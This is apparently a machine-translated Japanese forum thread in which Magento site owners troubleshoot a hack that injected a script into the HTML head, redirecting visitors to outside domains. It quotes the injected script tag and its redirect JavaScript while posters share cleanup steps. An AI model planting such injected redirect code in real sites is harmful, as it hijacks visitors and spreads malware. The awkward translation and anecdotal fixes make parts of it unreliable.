ウェブサイトが別のURLへのリダイレクトを開始する

Maybe it's infected by some virus.

私のウェブサイトはこれらの感染したURLへのリダイレクトを開始します。

http://mon.setsu.xyz
およびしばらくhttps://tiphainemollard.us/index/?1371499155545
感染したリンク

私が解決するために何をしたか。

1. コメント付きの.htaccessファイル（何も起こらない）
2. コメント付きのインクルードフォルダー（何も起こらない）
3. 完全なサーバーをスキャンしました（ウイルスマルウェアが検出されなかったことはありません）
4. データベースのCSS、メディア、およびjsパスを変更して、そのPHPまたはjsが実行している天気を確認します（何も起こりません）。
5. select * from core_config_data where path like '%secure%';すべてのリンクは問題ありません UPDATE

私はグーグルでこれについて多くの記事が書かれていましたが、それはブラウザの問題か私のシステムが感染していることを示唆しています。 私の携帯電話や個人のラップトップでサイトを開いても、これに関する記事は同じです。

アップデート2

影響を受けるデータベースの行を見つけました。（Boris K.も言っているように）

ではcore_config_data 、テーブル design/head/includes 値持っています

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

ページ読み込み時にヘッドセクションに挿入されます。

上記のURLにアクセスすると、リダイレクトのスクリプトが表示されます。

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

スクリプトを削除すると、クライアントのWebサイトは午後から機能します。 But the main problem is how that script inserted into the database.

1つのパッチも古いので、そのパッチも更新しました。

更新3 サイトは再び感染しました。これは、管理セクションに挿入されたスクリプトです（[管理]-> [構成]-> [一般]-> [設計]-> [HTMLヘッド]-> [その他のスクリプト]）。

そしてデータベース列

今何をしたらいいのか分かりません。すべてのパスワードを変更したので、古いユーザーをすべて削除しました。

アップデート3

今まではそのエラーは発生しないので、上記の手順に従うことでこの問題を解決できます。

更新:: 4 常にパッチをインストールしてください。これは、プロジェクトで私がストアをこれらのタイプの問題に陥りにくくするのに役立ち、パッチも重要です。https://magescan.com/を使用して、Webサイトで問題を確認できます。

挿入されたコードは、core_config_data表の下ので見つかりましたdesign/head/includes。それを削除すると、サイトは通常に戻ります。

更新：他の皆が述べたように、それは今朝再び起こりました。今回は、の下の管理パネルから簡単に取り除くことができましたSystem > Configuration > General > Design > HTML Head > Miscellaneous Scripts。これは大きな脆弱性です。Magentoがパッチに取り組んでいることを願っています。

更新2：スクリプトが再び戻ってきたので、dbパスワードを変更し、キャッシュをクリアしました。約1時間後、スクリプトが戻ってきました。だから、それはdbを通じて追加されているとは思わない。管理者パスワードを変更しました。もう一度戻ってくるかどうか確認してみましょう。

更新3：影響を受ける両方のサイトで昨日管理者パスワードを変更したため、約24時間後もどちらもまだクリーンです。

別のmagentoサイトで同じ問題。スクリプトがページのHEADセクションに挿入され、melissatgmt.usからredirect_base / redirect.jsを要求する（その後、別のドメインに変更される）ことを発見しましたが、このたわごとがどのように挿入されるのか理解できません。

UPDATE：他の人が述べたように、core_config_dataテーブルでエントリを見つけて削除しましたが、レコードは次のページのリロード時に戻ってきました。私はdbパスワードを変更しましたが、今や敗北しているようです。パスワードの変更が最終的な解決策になるかどうかはわかりませんが、とにかくセキュリティが向上しています。

更新2：Jix Sasが述べたように、magento管理でconfigからアクセスすることは、データベーステーブルに直接アクセスするよりも簡単なソリューションです。しかし、たわごとは10/15分ごとに戻ってきます。

更新3：管理者パスワードの変更、いくつかのcmsページ（customer-serviceおよびabout-us）の確認と保存、何らかの形で感染、キャッシュの無効化、キャッシュのクリーニング（数回（「感染した」cmsページのすべての確認と保存の後））いいえ過去8時間に追加のスクリプトが挿入されました。

で管理パネルへのパスを変更しましたapp/etc/local.xml。スクリプトはに追加されなくなりましたdesign/head/includes。

説明 ：

でapp/etc/local.xml、私は変更<admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>以前は、だった sitedomain.com/admin、と今で管理者パネルへのパスは次のようになります sitedomain.com/new_admin_path

これはとても大きな安心でした。サイトを午前から10回復元しました。

バグは何度も何度も発生し続けます。

究極のソリューションは何ですか？

DBパスワードを変更しますか？ルートパスワードを変更しますか？パッチはリリースされていますか？

これが関連しているかどうかはわかりませんが、セキュリティコンサルタントからのメールの下にあります

親愛なるサーまたはマダム、

私たちは、スイス、ポーランド、オランダに拠点を置くMagento開発会社のハティメリアです。

最近、新しいクライアントで作業を開始し、彼の古いサーバーを引き継ぎました。サーバーにアクセスした瞬間、いくつかのマルウェアに遭遇しました。ハッカーはクライアントのサーバーを乗っ取り、「ハッカーマシン」として他のウェブサイトをハッキングすることができました。もちろん、クライアントはこれが自分のサーバーで起こっていることを知りませんでした。

そのサーバーを介してハッキングされたあなたのウェブサイトのデータベース資格情報が見つかりました。もちろん、私たちは何もしませんが、私はあなたに連絡し、何が起こっているのかをあなたに知らせる義務があります。ハッキングはMagento Cacheleakの脆弱性を介して行われました。この脆弱性は現在もストアに存在している可能性があります。

その脆弱性にすぐに対処し、データベースのパスワードを変更することをお勧めします。技術者によると、これには約30分かかります。

ウェブサイトMageReportで、あなたのウェブサイトが他に何に対して脆弱であるかを見ることができます：https ://www.magereport.com/scan/?s =

このメールの主な目的は、顧客の獲得を目的とするものではありませんが、ストアのセキュリティ確保についてサポートが必要な場合、またはその他の質問がある場合は、喜んでお手伝いします。

敬具、トーマス・タナー

解決策はDBパスワードの変更だと思います

そのようなスパム挿入の主な原因は何かを理解する必要があります

サイトが挿入された場合は、3つすべてのマルウェアスキャンでサイトを確認してください

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

これはセキュリティパッチがないためだと思います！パッチが不足している場合は、このトピックの下に報告してください。

1. ホスティングアクセスパスワードの変更データベースパスワードの変更管理者ログインパスワードの変更 URLを非表示にしてダウンロードし、パブリックビューで/ RSS /を非表示にします。

2. サイト全体のウイルススキャンを実行します。自分で実行できない場合、ホスティングプロバイダーはサイトをスキャンできます。

3. Sysytem-> Usersに移動し、アカウントに未承認の登録ユーザーが存在するかどうかを確認します。

問題を修正しました。値<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>のcore_config_dataテーブルからこのファイルを削除した後でもdesign/head/includes。問題は解決しませんでした。スクリプトコードが何度も挿入されました。問題を解決するには、次の3つの手順を実行します。

1. のcore_config_data表からスクリプトコードを削除しますdesign/head/includes。
2. app/etc/local.xml資格情報を含むデータベースのパスワードを変更します。
3. このコマンドを使用してルートMagentoフォルダーのキャッシュをクリアする rm -rf var/cache/*

私は一日中過ごしたps。うまくいけば、これはあなたのために働くでしょう。そして、常にファイルをバックアップしてください。

これとまったく同じことが今日起こったのです！同じウェブサイトにリダイレクトします。しかし、スクリプトはMagento管理パネルのconfiguration> design> html head> miscスクリプトで見つかりました。このスクリプトがありました。<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> 私はそこから削除し、ウェブサイトは正常に機能しています。あなたがスクリプトを見つけたと言ったフォルダがありません。どこにあるのか考えられますか？

また、最近何をしましたか？原因を突き止められるかな？私には、原因となる無料のニュースレターポップアップをインストールしました。あなたはどうですか？

更新：さて、スクリプトは戻ってきました。誰かがデータベースからこのスクリプトにアクセスして削除するにはどうすればよいですか？

更新2：マークが述べたように、スクリプトを削除し、データベースのパスワードを変更すると、このスクリプトが戻されなくなりました。この脆弱性の名前を誰かが知っている場合、または顧客への支払いに危険がある場合は、お知らせください。